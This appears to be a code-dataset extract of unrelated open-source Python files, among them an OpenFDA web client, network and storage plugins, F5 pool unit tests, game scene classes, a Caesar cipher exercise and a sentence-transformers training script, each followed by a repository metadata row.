OPENFDA_API_URL = "api.fda.gov"
OPENFDA_API_EVENT = "/drug/event.json"
OPENFDA_API_LYRICA = '?search=patient.drug.medicinalproduct:"LYRICA"&limit=10'
def get_main_page(self):
html = '''
<html>
<head>
<title>OpenFDA app</title>
</head>
<body>
<h1>OpenFDA Client</h1>
<form method='get' action='receivedrug'>
<input type='submit' value='Enviar a OpenFDA'>
</input>
</form>
<form method='get' action='searchmed'>
<input type='text' name='drug'></input>
<input type='submit' value='Buscar Medicamento'></input>
</form>
<form method='get' action='receivecompany'>
<input type='submit' value='Find companies'></input>
</form>
<form method='get' action='searchcom'>
<input type='text' name='drug'></input>
<input type='submit' value='Buscar medicinalproduct'></input>
</form>
</body>
</html>
'''
return html
def get_med(self,drug):
conn = http.client.HTTPSConnection(self.OPENFDA_API_URL)
conn.request("GET", self.OPENFDA_API_EVENT + '?search=patient.drug.medicinalproduct:'+drug+'&limit=10')
r1 = conn.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
data = data1.decode('utf8')
events = json.loads(data)
#event = events['results'][0]['patient']['drug']
return events
def get_medicinalproduct(self,com_num):
conn = http.client.HTTPSConnection(self.OPENFDA_API_URL)
conn.request("GET", self.OPENFDA_API_EVENT + '?search=companynumb:'+com_num+'&limit=10')
r1 = conn.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
data = data1.decode('utf8')
events = json.loads(data)
return events
def get_event(self):
conn = http.client.HTTPSConnection(self.OPENFDA_API_URL)
conn.request("GET", self.OPENFDA_API_EVENT + '?limit=10')
r1 = conn.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
data = data1.decode('utf8')
events = json.loads(data)
#event = events['results'][0]['patient']['drug']
return events
def get_drug(self, events):
medicamentos=[]
for event in events['results']:
medicamentos+=[event['patient']['drug'][0]['medicinalproduct']]
return medicamentos
def get_com_num(self, events):
com_num=[]
for event in events['results']:
com_num+=[event['companynumb']]
return com_num
def drug_page(self,medicamentos):
s=''
for drug in medicamentos:
s += "<li>"+drug+"</li>"
html='''
<html>
<head></head>
<body>
<ul>
%s
</ul>
</body>
</html>''' %(s)
return html
def do_GET(self):
print (self.path)
#print (self.path)
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
if self.path == '/' :
html = self.get_main_page()
self.wfile.write(bytes(html,'utf8'))
elif self.path == '/receivedrug?':
events = self.get_event()
medicamentos = self.get_drug(events)
html = self.drug_page(medicamentos)
self.wfile.write(bytes(html,'utf8'))
elif self.path == '/receivecompany?':
events = self.get_event()
com_num = self.get_com_num(events)
html = self.drug_page(com_num)
self.wfile.write(bytes(html,'utf8'))
elif 'searchmed' in self.path:
drug=self.path.split('=')[1]
print (drug)
events = self.get_med(drug)
com_num = self.get_com_num(events)
html = self.drug_page(com_num)
self.wfile.write(bytes(html,'utf8'))
elif 'searchcom' in self.path:
com_num = self.path.split('=')[1]
print (com_num)
events = self.get_medicinalproduct(com_num)
medicinalproduct = self.get_drug(events)
html = self.drug_page(medicinalproduct)
self.wfile.write(bytes(html,'utf8'))
return
| varoroyo/Alvaro-Roman | web.py | Python | apache-2.0 | 5,333 |
import psutil
from ajenti.api import *
from ajenti.ui import *
@plugin
class NetworkManager (BasePlugin):
def get_devices(self):
return psutil.net_io_counters(pernic=True).keys()
@interface
class INetworkConfig (object):
interfaces = {}
@property
def interface_list(self):
return self.interfaces.values()
def rescan(self):
pass
def save(self):
pass
@interface
class INetworkConfigBit (object):
def apply(self):
pass
@plugin
class NetworkConfigBit (UIElement, INetworkConfigBit):
cls = 'unknown'
iface = None
title = 'Unknown'
typeid = 'box'
class NetworkInterface(object):
def __init__(self):
self.up = False
self.auto = False
self.name = ''
self.devclass = ''
self.addressing = 'static'
self.bits = []
self.params = {'address': '0.0.0.0'}
self.type = ''
self.editable = True
def __getitem__(self, idx):
if idx in self.params:
return self.params[idx]
else:
return ''
def __setitem__(self, idx, val):
self.params[idx] = val
def add_bits(self, ui):
for cls in INetworkConfigBit.get_classes():
if cls.cls in self.bit_classes:
b = cls.new(ui)
b.iface = self
b.refresh()
self.bits.append(b)
| lupyuen/RaspberryPiImage | usr/share/pyshared/ajenti/plugins/network/api.py | Python | apache-2.0 | 1,407 |
from keras import backend as K
class Config:
def __init__(self):
self.verbose = True
self.network = 'resnet50'
# setting for data augmentation
self.use_horizontal_flips = True
self.use_vertical_flips = True
self.rot_90 = True
# anchor box scales
self.anchor_box_scales = [1, 2, 4, 8, 16, 32, 64, 124, 256, 512]
# anchor box ratios
self.anchor_box_ratios = [[1, 1], [1, 2], [2, 1],[1,3],[3,1],[4,1],[1,4],[1,5],[5,1],[1,6],[6,1],[1,7],[7,1],[1,8],[8,1],[1,9],[9,1]]
# size to resize the smallest side of the image
self.im_size = 600
# image channel-wise mean to subtract
self.img_channel_mean = [103.939, 116.779, 123.68]
self.img_scaling_factor = 1.0
# number of ROIs at once
self.num_rois = 8
# stride at the RPN (this depends on the network configuration)
self.rpn_stride = 16
self.balanced_classes = False
# scaling the stdev
self.std_scaling = 4.0
self.classifier_regr_std = [8.0, 8.0, 4.0, 4.0]
# overlaps for RPN
self.rpn_min_overlap = 0.3
self.rpn_max_overlap = 0.7
# overlaps for classifier ROIs
self.classifier_min_overlap = 0.1
self.classifier_max_overlap = 0.5
# placeholder for the class mapping, automatically generated by the parser
self.class_mapping = None
#location of pretrained weights for the base network
# weight files can be found at:
# https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_th_dim_ordering_th_kernels_notop.h5
# https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5
self.model_path = 'model_frcnn.vgg.hdf5'
| yhalk/vw_challenge_ECR | src/jetson/keras_frcnn/config.py | Python | apache-2.0 | 1,646 |
# -*- coding: utf-8 -*-
"""Class representing the mapper for the parser init files."""
from plasoscaffolder.bll.mappings import base_mapping_helper
from plasoscaffolder.bll.mappings import base_sqliteplugin_mapping
from plasoscaffolder.model import init_data_model
class ParserInitMapping(
base_sqliteplugin_mapping.BaseSQLitePluginMapper):
"""Class representing the parser mapper."""
_PARSER_INIT_TEMPLATE = 'parser_init_template.jinja2'
def __init__(self, mapping_helper: base_mapping_helper.BaseMappingHelper):
"""Initializing the init mapper class.
Args:
mapping_helper (base_mapping_helper.BaseMappingHelper): the helper class
for the mapping
"""
super().__init__()
self._helper = mapping_helper
def GetRenderedTemplate(
self,
data: init_data_model.InitDataModel) -> str:
"""Retrieves the parser init file.
Args:
data (init_data_model.InitDataModel): the data for init file
Returns:
str: the rendered template
"""
context = {'plugin_name': data.plugin_name,
'is_create_template': data.is_create_template}
rendered = self._helper.RenderTemplate(
self._PARSER_INIT_TEMPLATE, context)
return rendered
| ClaudiaSaxer/PlasoScaffolder | src/plasoscaffolder/bll/mappings/parser_init_mapping.py | Python | apache-2.0 | 1,234 |
"""Python Library Boilerplate contains all the boilerplate you need to create a Python package."""
__author__ = 'Michael Joseph'
__email__ = '[email protected]'
__url__ = 'https://github.com/michaeljoseph/sealeyes'
__version__ = '0.0.1'
def sealeyes():
return 'Hello World!'
| michaeljoseph/sealeyes | sealeyes/__init__.py | Python | apache-2.0 | 288 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# String literals representing core resources.
ADDRESS_GROUP = 'address_group'
AGENT = 'agent'
FLOATING_IP = 'floatingip'
LOCAL_IP_ASSOCIATION = 'local_ip_association'
NETWORK = 'network'
NETWORKS = 'networks'
PORT = 'port'
PORTS = 'ports'
PORT_BINDING = 'port_binding'
PORT_DEVICE = 'port_device'
PROCESS = 'process'
RBAC_POLICY = 'rbac-policy'
ROUTER = 'router'
ROUTER_CONTROLLER = 'router_controller'
ROUTER_GATEWAY = 'router_gateway'
ROUTER_INTERFACE = 'router_interface'
SECURITY_GROUP = 'security_group'
SECURITY_GROUP_RULE = 'security_group_rule'
SEGMENT = 'segment'
SEGMENT_HOST_MAPPING = 'segment_host_mapping'
SUBNET = 'subnet'
SUBNETS = 'subnets'
SUBNETPOOL_ADDRESS_SCOPE = 'subnetpool_address_scope'
SUBPORTS = 'subports'
TRUNK = 'trunk'
TRUNK_PLUGIN = 'trunk_plugin'
| openstack/neutron-lib | neutron_lib/callbacks/resources.py | Python | apache-2.0 | 1,353 |
#!/usr/bin/env python
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
from pprint import pprint as pp
from f5_cccl.resource.ltm.pool import *
from mock import MagicMock
import pytest
bigip_pools_cfg = [
{'description': None,
'partition': 'Common',
'loadBalancingMode': 'round-robin',
'monitor': '/Common/http ',
'membersReference': {
'isSubcollection': True,
'items': [
{'ratio': 1,
'name': '172.16.0.100:8080',
'partition': 'Common',
'session': 'monitor-enabled',
'priorityGroup': 0,
'connectionLimit': 0,
'description': None},
{'ratio': 1,
'name': '172.16.0.101:8080',
'partition': 'Common',
'session': 'monitor-enabled',
'priorityGroup': 0,
'connectionLimit': 0,
'description': None}
]
},
'name': u'pool1'
},
{'description': None,
'partition': 'Common',
'loadBalancingMode': 'round-robin',
'monitor': '/Common/http ',
'name': u'pool1'
}
]
cccl_pools_cfg = [
{ "name": "pool0" },
{ "name": "pool1",
"members": [
{"address": "172.16.0.100", "port": 8080, "routeDomain": {"id": 0}},
{"address": "172.16.0.101", "port": 8080, "routeDomain": {"id": 0}}
],
"monitors": ["/Common/http"]
},
{ "name": "pool2",
"members": [
{"address": "192.168.0.100", "port": 80, "routeDomain": {"id": 2}},
{"address": "192.168.0.101", "port": 80, "routeDomain": {"id": 2}}
],
"monitors": []
},
{ "name": "pool3",
"members": [],
"description": "This is test pool 3",
"monitors": []
},
{ "name": "pool4",
"members": [],
"description": "This is test pool 4",
"monitors": ["/Common/http"]
},
{ "name": "pool1",
"members": [
{"address": "172.16.0.100", "port": 8080, "routeDomain": {"id": 0}},
{"address": "172.16.0.102", "port": 8080, "routeDomain": {"id": 0}}
],
"monitors": ["/Common/http"]
}
]
@pytest.fixture
def bigip():
bigip = MagicMock()
return bigip
@pytest.fixture
def bigip_pool0():
return bigip_pools_cfg[0]
@pytest.fixture
def bigip_pool1():
return bigip_pools_cfg[1]
@pytest.fixture
def cccl_pool0():
return cccl_pools_cfg[0]
@pytest.fixture
def cccl_pool1():
return cccl_pools_cfg[1]
@pytest.fixture
def cccl_pool2():
return cccl_pools_cfg[2]
@pytest.fixture
def cccl_pool3():
return cccl_pools_cfg[3]
@pytest.fixture
def cccl_pool5():
return cccl_pools_cfg[5]
@pytest.fixture
def bigip_members():
members_filename = (
os.path.join(os.path.dirname(os.path.abspath(__file__)),
'./bigip-members.json'))
with open(members_filename) as fp:
json_data = fp.read()
json_data = json.loads(json_data)
members = [m for m in json_data['members']]
pp(json_data)
return members
def test_create_pool_minconfig(cccl_pool0):
pool = ApiPool(partition="Common", **cccl_pool0)
assert pool.name == "pool0"
assert pool.partition == "Common"
assert pool.data['loadBalancingMode'] == "round-robin"
assert not pool.data['description']
assert len(pool) == 0
assert pool.data['monitor'] == "default"
def test_create_pool(cccl_pool1):
pool = ApiPool(partition="Common", **cccl_pool1)
assert pool.name == "pool1"
assert pool.partition == "Common"
assert pool.data['loadBalancingMode'] == "round-robin"
assert not pool.data['description']
assert pool.data['monitor'] == "/Common/http"
assert len(pool) == 2
def test_create_pool_empty_lists(cccl_pool3):
pool = ApiPool(partition="Common", **cccl_pool3)
assert pool.name == "pool3"
assert pool.partition == "Common"
assert pool.data['loadBalancingMode'] == "round-robin"
assert pool.data['description'] == "This is test pool 3"
assert pool.data['monitor'] == "default"
assert len(pool) == 0
def test_compare_equal_pools(cccl_pool0):
p1 = ApiPool(partition="Common", **cccl_pool0)
p2 = ApiPool(partition="Common", **cccl_pool0)
assert id(p1) != id(p2)
assert p1 == p2
def test_compare_pool_and_dict(cccl_pool0):
pool = ApiPool(partition="Common", **cccl_pool0)
assert not pool == cccl_pool0
def test_get_uri_path(bigip, cccl_pool0):
pool = ApiPool(partition="Common", **cccl_pool0)
assert pool._uri_path(bigip) == bigip.tm.ltm.pools.pool
def test_pool_hash(bigip, cccl_pool0):
pool = ApiPool(partition="Common", **cccl_pool0)
assert hash(pool) == hash((pool.name, pool.partition))
def test_compare_bigip_cccl_pools(cccl_pool1, bigip_pool0):
bigip_pool = IcrPool(**bigip_pool0)
cccl_pool = ApiPool(partition="Common", **cccl_pool1)
assert bigip_pool == cccl_pool
def test_create_bigip_pool_no_members(bigip_pool1):
bigip_pool = IcrPool(**bigip_pool1)
assert bigip_pool.data['membersReference']
assert bigip_pool.data['membersReference']['items'] == []
def test_compare_pools_unequal_members(bigip, cccl_pool1, cccl_pool2, cccl_pool5):
pool1 = ApiPool(partition="Common", **cccl_pool1)
pool2 = ApiPool(partition="Common", **cccl_pool2)
pool5 = ApiPool(partition="Common", **cccl_pool5)
pool1_one_member_cfg = { "name": "pool1",
"members": [
{"address": "172.16.0.100", "port": 8080, "routeDomain": {"id": 0}},
],
"monitors": ["/Common/http"]
}
pool1_one_member = ApiPool(partition="Common",
**pool1_one_member_cfg)
pool2_with_monitor = { "name": "pool2",
"members": [
{"address": "192.168.0.100", "port": 80, "routeDomain": {"id": 2}},
{"address": "192.168.0.101", "port": 80, "routeDomain": {"id": 2}}
],
"monitors": ["/Common/http"]
}
pool2_with_monitor = ApiPool(partition="Common",
**pool2_with_monitor)
assert not pool1 == pool2
assert pool1 != pool2
assert not pool1_one_member == pool1
assert not pool2_with_monitor == pool2
assert not pool1 == pool5
assert pool1 != pool5
assert pool5 != pool1
def test_get_monitors(bigip):
pool = ApiPool(name="pool1", partition="Common")
assert pool._get_monitors(None) == "default"
assert pool._get_monitors([]) == "default"
monitors = ["/Common/http", "/Common/my_tcp"]
assert pool._get_monitors(monitors) == "/Common/http and /Common/my_tcp"
monitors = ["", ""]
assert pool._get_monitors(monitors) == " and "
monitors = ["/Common/my_tcp", "/Common/http"]
assert pool._get_monitors(monitors) == "/Common/http and /Common/my_tcp"
| richbrowne/f5-cccl | f5_cccl/resource/ltm/test/test_pool.py | Python | apache-2.0 | 7,378 |
"""
rohmu
Copyright (c) 2016 Ohmu Ltd
See LICENSE for details
"""
from . errors import InvalidConfigurationError
IO_BLOCK_SIZE = 2 ** 20 # 1 MiB
def get_class_for_transfer(storage_type):
if storage_type == "azure":
from .object_storage.azure import AzureTransfer
return AzureTransfer
elif storage_type == "google":
from .object_storage.google import GoogleTransfer
return GoogleTransfer
elif storage_type == "local":
from .object_storage.local import LocalTransfer
return LocalTransfer
elif storage_type == "s3":
from .object_storage.s3 import S3Transfer
return S3Transfer
elif storage_type == "swift":
from .object_storage.swift import SwiftTransfer
return SwiftTransfer
raise InvalidConfigurationError("unsupported storage type {0!r}".format(storage_type))
def get_transfer(storage_config, *, storage_type=None):
# TODO: drop storage_type from the function signature, always read it from the config
if "storage_type" in storage_config:
storage_config = storage_config.copy()
storage_type = storage_config.pop("storage_type")
storage_class = get_class_for_transfer(storage_type)
return storage_class(**storage_config)
| saaros/pghoard | pghoard/rohmu/__init__.py | Python | apache-2.0 | 1,265 |
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
# This setup file is used when running cloud training or cloud dataflow jobs.
from setuptools import setup, find_packages
setup(
name='trainer',
version='1.0.0',
packages=find_packages(),
description='Google Cloud Datalab helper sub-package',
author='Google',
author_email='[email protected]',
keywords=[
],
license="Apache Software License",
long_description="""
""",
install_requires=[
'tensorflow==1.15.2',
'protobuf==3.1.0',
'pillow==6.2.0', # ML Engine does not have PIL installed
],
package_data={
},
data_files=[],
)
| googledatalab/pydatalab | solutionbox/ml_workbench/tensorflow/setup.py | Python | apache-2.0 | 1,189 |
# Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.tutorial.TutorialTVScenes
from panda3d.core import Camera
from direct.task.Task import Task
from otp.avatar import Emote
from toontown.television.TVScenes import *
from toontown.television.TVEffects import *
from toontown.suit.Suit import Suit
from toontown.suit.BossCog import BossCog
from toontown.suit.SuitDNA import SuitDNA
from toontown.toon import NPCToons, TTEmote
import random
class CEOScene(ThreeDScene):
CameraPos = [(0, 203.5, 23.5, 0, 350, 0)]
def __init__(self, effects = []):
ThreeDScene.__init__(self, 'CEOScene', effects)
self.geom = loader.loadModel('phase_12/models/bossbotHQ/BanquetInterior_1')
self.geom.reparentTo(self)
self.ceo = BossCog()
dna = SuitDNA()
dna.newBossCog('c')
self.ceo.setDNA(dna)
self.ceo.reparentTo(self)
self.ceo.setPosHpr(0, 236.5, 0, 180, 0, 0)
self.ceo.loop('Bb_neutral')
def delete(self):
if self.geom:
self.geom.removeNode()
self.geom = None
if self.ceo:
self.ceo.delete()
self.ceo = None
ThreeDScene.delete(self)
return
class HeadHunterScene(ThreeDScene):
CameraPos = [(-22, -12.5, 7, 92, -6, 0)]
def __init__(self, effects = []):
ThreeDScene.__init__(self, 'HeadHunterScene', effects)
self.geom = loader.loadModel('phase_12/models/bossbotHQ/BossbotEntranceRoom')
self.geom.reparentTo(self)
self.cog = Suit()
dna = SuitDNA()
dna.newSuit('hh')
self.cog.setDNA(dna)
self.cog.reparentTo(self)
self.cog.setPosHpr(-32.5, -12.5, 0.02, 270, 0, 0)
self.cog.nametag3d.removeNode()
self.cog.nametag.destroy()
self.cog.loop('neutral')
def delete(self):
if self.geom:
self.geom.removeNode()
self.geom = None
if self.cog:
self.cog.delete()
self.cog = None
ThreeDScene.delete(self)
return
class ScientistScene(ThreeDScene):
CameraPos = [(-47.5, 0.5, 3.415, 90, 0, 0)]
ToonPos = {2018: (-59, -1.5, 0.02, 270, 0, 0),
2019: (-59, 0.5, 0.02, 270, 0, 0),
2020: (-59, 2.5, 0.02, 270, 0, 0)}
RandomEmotes = ['wave',
'angry',
'applause',
'cringe',
'confused',
'slip-forward',
'slip-backward',
'resistance-salute',
'surprise',
'cry',
'furious',
'laugh',
'idea',
'taunt',
'rage']
def __init__(self, effects = []):
ThreeDScene.__init__(self, 'ScientistScene', effects)
self.geom = loader.loadModel('phase_3.5/models/modules/tt_m_ara_int_toonhall')
self.geom.reparentTo(self)
self.taskStarted = False
self.npcs = []
for id, posHpr in self.ToonPos.iteritems():
npc = NPCToons.createLocalNPC(id)
npc.reparentTo(self.geom)
npc.setPosHpr(*posHpr)
npc.nametag3d.removeNode()
npc.nametag.destroy()
self.npcs.append(npc)
def delete(self):
if self.geom:
self.geom.removeNode()
self.geom = None
for npc in self.npcs:
taskMgr.remove(npc.uniqueName('randomEmote'))
npc.delete()
self.npcs = []
self.taskStarted = False
ThreeDScene.delete(self)
return
def startTask(self):
if self.taskStarted:
return
for i, npc in enumerate(self.npcs):
taskMgr.doMethodLater(0.25 * i, lambda task, npc = npc: self.doRandomEmote(npc, task), npc.uniqueName('randomEmote'))
self.taskStarted = True
def stopTask(self):
if not self.taskStarted:
return
for npc in self.npcs:
taskMgr.remove(npc.uniqueName('randomEmote'))
self.taskStarted = False
def doRandomEmote(self, npc, task):
Emote.globalEmote.doEmote(npc, TTEmote.Emotes.index(random.choice(self.RandomEmotes)), 0)
task.delayTime = npc.emoteTrack.getDuration() + 1.0
return task.again | DedMemez/ODS-August-2017 | tutorial/TutorialTVScenes.py | Python | apache-2.0 | 4,254 |
import cs50
import sys
def main():
if len(sys.argv) != 2:
print("You should provide cmd line arguments!")
exit(1)
#if sys.argv[1].isalpha() == False:
#print("You should provide valid key!")
#exit(1)
kplainText = int(sys.argv[1])
cipher = []
plainText = cs50.get_string()
for symbol in plainText:
if symbol.isalpha():
cipher.append(caesar(symbol, kplainText))
else:
cipher.append(symbol)
print("".join(cipher))
exit(0)
def caesar(char, kplainText):
if char.isupper():
return chr(((ord(char) - 65 + kplainText) % 26) + 65)
else:
return chr(((ord(char) - 97 + kplainText) % 26) + 97)
if __name__ == "__main__":
main()
# #include <ctype.h>
# #include <string.h>
# #include <cs50.h>
# #include <stdio.h>
# #include <stdlib.h>
# //define my caesarCipher
# void caesarCipher(char* plainText,int key);
# def int main(int argc, char* argv[]): # //{//????????????????/char*
# if argc is not 2:
# # {
# print("Usage: ./caesar k\n")
# #return 1
# #}
# #//printf(" %s\n", argv[1]);
# int key = atoi(sys.argv[1])
# char plainText[101]
# print("plaintext: ")#;//ask user
# fgets(plainText, sizeof(plainText), stdin);//get user input & store it in planText var++++++++
# print("ciphertext: ")#;//print the ciphered text
# caesarCipher(plainText,key)
# //system(pause);//connect out if not use wind---------------------------???????????????
# # return 0;
# #}
# void caesarCipher(char* plainText, int key){//key pomen mestami on first plaiiiiiiiiiin
# int i = 0
# char cipher
# int cipherValue
# while plainText[i] != '\0' and strlen(plainText) -1 > i :break#// for(int i=1,len=strlen(name);i<len;i++)
# if isalpha(plainText[i]) and islower(plainText[i]):
# cipherValue = ((int)((plainText[i]) - 97 + key) % 26 + 97)
# cipher = (char)(cipherValue);printf("%c", cipher)
# i++
# else:
# if isalpha(plainText[i]) and isupper(plainText[i]):# // if isaph char
# cipherValue = ((int)(plainText[i] - 65 + key) % 26 + 65)
# cipher = (char)(cipherValue)
# print("%c", cipher)
# i++
# else: #//if not isaplha low or up
# print("%c", plainText[i])
# i++
# print("\n")
#} | DInnaD/CS50 | pset6/caesar.py | Python | apache-2.0 | 2,532 |
# Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from voltha.protos.events_pb2 import AlarmEventType, AlarmEventSeverity, AlarmEventCategory
from voltha.extensions.alarms.adapter_alarms import AlarmBase
class OltLosAlarm(AlarmBase):
def __init__(self, alarm_mgr, intf_id, port_type_name):
super(OltLosAlarm, self).__init__(alarm_mgr, object_type='olt LOS',
alarm='OLT_LOS',
alarm_category=AlarmEventCategory.OLT,
alarm_type=AlarmEventType.COMMUNICATION,
alarm_severity=AlarmEventSeverity.MAJOR)
# Added port type to indicate if alarm was on NNI or PON
self._intf_id = intf_id
self._port_type_name = port_type_name
def get_context_data(self):
return {'olt-intf-id:': self._intf_id,
'olt-port-type-name': self._port_type_name}
| opencord/voltha | voltha/extensions/alarms/olt/olt_los_alarm.py | Python | apache-2.0 | 1,492 |
# -*- coding: utf-8 -*-
# Copyright 2017 DST Controls
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
osisoftpy.factory
~~~~~~~~~~~~
"""
from __future__ import (absolute_import, division, unicode_literals)
from future.builtins import *
from future.utils import iteritems
def create(factory, thing, session, webapi=None):
"""
Return an object created with factory
:param webapi:
:param factory:
:param params:
:param session:
:return:
"""
payload = dict(map(lambda k_v: (k_v[0].lower(), k_v[1]), iteritems(thing)))
# added to avoid creating Value objects if the value was considered bad values
# but we don't need this since we don't want the library to cull bad values that
# the pi web api gave us.
#
# if 'good' in payload:
# if not payload['good']:
# return None
payload.update({'session': session, 'webapi': webapi})
thing = factory.create(**payload)
return thing
class Factory(object):
def __init__(self, type_):
self.type = type_
def create(self, **kwargs):
return self.type(**kwargs)
| dstcontrols/osisoftpy | src/osisoftpy/factory.py | Python | apache-2.0 | 1,646 |
"""
This example loads the pre-trained SentenceTransformer model 'nli-distilroberta-base-v2' from the server.
It then fine-tunes this model for some epochs on the STS benchmark dataset.
Note: In this example, you must specify a SentenceTransformer model.
If you want to fine-tune a huggingface/transformers model like bert-base-uncased, see training_nli.py and training_stsbenchmark.py
"""
from torch.utils.data import DataLoader
import math
from sentence_transformers import SentenceTransformer, LoggingHandler, losses, util, InputExample
from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator
import logging
from datetime import datetime
import os
import gzip
import csv
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
handlers=[LoggingHandler()])
#### /print debug information to stdout
#Check if dataset exsist. If not, download and extract it
sts_dataset_path = 'datasets/stsbenchmark.tsv.gz'
if not os.path.exists(sts_dataset_path):
util.http_get('https://sbert.net/datasets/stsbenchmark.tsv.gz', sts_dataset_path)
# Read the dataset
model_name = 'nli-distilroberta-base-v2'
train_batch_size = 16
num_epochs = 4
model_save_path = 'output/training_stsbenchmark_continue_training-'+model_name+'-'+datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
# Load a pre-trained sentence transformer model
model = SentenceTransformer(model_name)
# Convert the dataset to a DataLoader ready for training
logging.info("Read STSbenchmark train dataset")
train_samples = []
dev_samples = []
test_samples = []
with gzip.open(sts_dataset_path, 'rt', encoding='utf8') as fIn:
reader = csv.DictReader(fIn, delimiter='\t', quoting=csv.QUOTE_NONE)
for row in reader:
score = float(row['score']) / 5.0 # Normalize score to range 0 ... 1
inp_example = InputExample(texts=[row['sentence1'], row['sentence2']], label=score)
if row['split'] == 'dev':
dev_samples.append(inp_example)
elif row['split'] == 'test':
test_samples.append(inp_example)
else:
train_samples.append(inp_example)
train_dataloader = DataLoader(train_samples, shuffle=True, batch_size=train_batch_size)
train_loss = losses.CosineSimilarityLoss(model=model)
# Development set: Measure correlation between cosine score and gold labels
logging.info("Read STSbenchmark dev dataset")
evaluator = EmbeddingSimilarityEvaluator.from_input_examples(dev_samples, name='sts-dev')
# Configure the training. We skip evaluation in this example
warmup_steps = math.ceil(len(train_dataloader) * num_epochs * 0.1) #10% of train data for warm-up
logging.info("Warmup-steps: {}".format(warmup_steps))
# Train the model
model.fit(train_objectives=[(train_dataloader, train_loss)],
evaluator=evaluator,
epochs=num_epochs,
evaluation_steps=1000,
warmup_steps=warmup_steps,
output_path=model_save_path)
##############################################################################
#
# Load the stored model and evaluate its performance on STS benchmark dataset
#
##############################################################################
model = SentenceTransformer(model_save_path)
test_evaluator = EmbeddingSimilarityEvaluator.from_input_examples(test_samples, name='sts-test')
test_evaluator(model, output_path=model_save_path) | UKPLab/sentence-transformers | examples/training/sts/training_stsbenchmark_continue_training.py | Python | apache-2.0 | 3,514 |
# Copyright 2011 Tsutomu Uchino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unohelper
from com.sun.star.frame import XController, XTitle, XDispatchProvider
from com.sun.star.lang import XServiceInfo
from com.sun.star.task import XStatusIndicatorSupplier
class MRIUIController(unohelper.Base,
XController, XTitle, XDispatchProvider,
XStatusIndicatorSupplier, XServiceInfo):
""" Provides controller which connects between frame and model. """
IMPLE_NAME = "mytools.mri.UIController"
def __init__(self,frame, model):
self.frame = frame
self.model = model
self.ui = None
def set_ui(self, ui):
self.ui = ui
def get_imple_name(self):
return self.ui.pages.get_imple_name()
# XTitle
def getTitle(self):
return self.frame.getTitle()
def setTitle(self, title):
self.frame.setTitle(title)
def dispose(self):
self.frame = None
self.model = None
def addEventListener(self, xListener):
pass
def removeEventListener(self, aListener):
pass
# XController
def attachFrame(self, frame):
self.frame = frame
def attachModel(self, model):
self.model = model
def suspend(self, Suspend):
return True
def getViewData(self):
""" Returns current instance inspected. """
return self.ui.main.current.target
def restoreViewData(self, Data):
pass
def getModel(self):
return self.model
def getFrame(self):
return self.frame
def getStatusIndicator(self):
pass
# XDispatchProvider
def queryDispatch(self, url, name, flags):
pass
def queryDispatches(self, requests):
pass
# XServiceInfo
def getImplementationName(self):
return self.IMPLE_NAME
def supportsService(self, name):
return name == self.IMPLE_NAME
def getSupportedServiceNames(self):
return self.IMPLE_NAME,
| hanya/MRI | pythonpath/mytools_Mri/ui/controller.py | Python | apache-2.0 | 2,539 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
